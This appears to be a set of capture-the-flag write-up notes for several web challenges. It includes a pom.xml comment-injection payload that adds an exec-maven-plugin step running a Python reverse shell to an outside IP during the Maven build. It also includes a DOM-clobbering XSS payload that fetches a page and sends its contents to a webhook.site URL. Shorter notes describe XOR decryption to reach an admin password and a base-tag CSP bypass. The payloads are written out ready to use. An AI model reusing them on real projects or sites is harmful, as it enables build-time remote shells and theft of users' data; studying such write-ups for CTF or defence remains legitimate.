Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>2.22.2</version>
<configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.3.2</version>
<executions>
<execution>
<id>s1r1us</id>
<goals>
<goal>exec</goal>
</goals>
<phase>initialize</phase>
<configuration>
<executable>python</executable>
<arguments>
<argument>-c</argument>
<argument>import sys,socket,os,pty;s=socket.socket();s.connect(("123.12.12.123",1337));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")</argument>
</arguments>
</configuration>
</execution>
</executions>
</plugin></plugins></build></project><!--
<forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds>
</configuration>
</plugin>
</plugins>
</build>
</project> // -->Post data is transmitted with the XOR of 'szefuSecurePassword2021'. Decrypt data and you can notice a method named getUsersDev which gives password to admin.
CSP can be bypassed by adding base tag
This is a nice puzzle, using dom clobbering we manipulate DOM and add nonce to our script tag. I got first blood for this challenge. Add below html as note.
<pwning urll>ends
st98
<base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
<a id=bad1 href="urll">ab</a>
<base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
<a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
<base href=a:abc><a id=good4 href="</script>">ad</a>
<a id=bad4 href="ends">ab</a>
<base href=a:abc><a id=bad2 href="<pwning">ad</a>
<a id=good2 href="
Final note looks like below
<html>
<head>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<title>Note</title>
</head>
<body>
<body>
<div id="content">
<pwning urll>ends
st98
<base href=a:abc><a id=good1 href="https://ctf.s1r1us.ninja/static/badwords.js?">ad</a>
<a id=bad1 href="urll">ab</a>
<base href=a:abc><a id=good3 href=">fetch('http://politernotepad.zajebistyc.tf/').then(x=>x.text()).then(x=>{a=btoa(encodeURIComponent(x));location='https://webhook.site/2b34b951-cc1a-4c17-b48b-bc5dc1faf52f?a='+a})//">ad</a>
<a id=bad3 href="src= https://ctf.s1r1us.ninja/static/badwords.js">ab</a>
<base href=a:abc><a id=good4 href="</script>">ad</a>
<a id=bad4 href="ends">ab</a>
<base href=a:abc><a id=bad2 href="<pwning">ad</a>
<a id=good2 href="
</div>
<script nonce=oNl8FB0B_pDXSnjjRlaf-Q src="http://politernotepad.zajebistyc.tf/static/badwords.js" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
</script>
<script nonce=oNl8FB0B_pDXSnjjRlaf-Q>
console.log(1)
var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
footer = '<div>'+footer+'</div>';
content = $('#content').html();
content += footer;
content = content.replaceAll(bad1, good1);
content = content.replaceAll(bad2, good2);
content = content.replaceAll(bad3, good3);
content = content.replaceAll(bad4, good4);
console.log(content);
$('#content').html(content);
</script>
</div>
</body>
</html>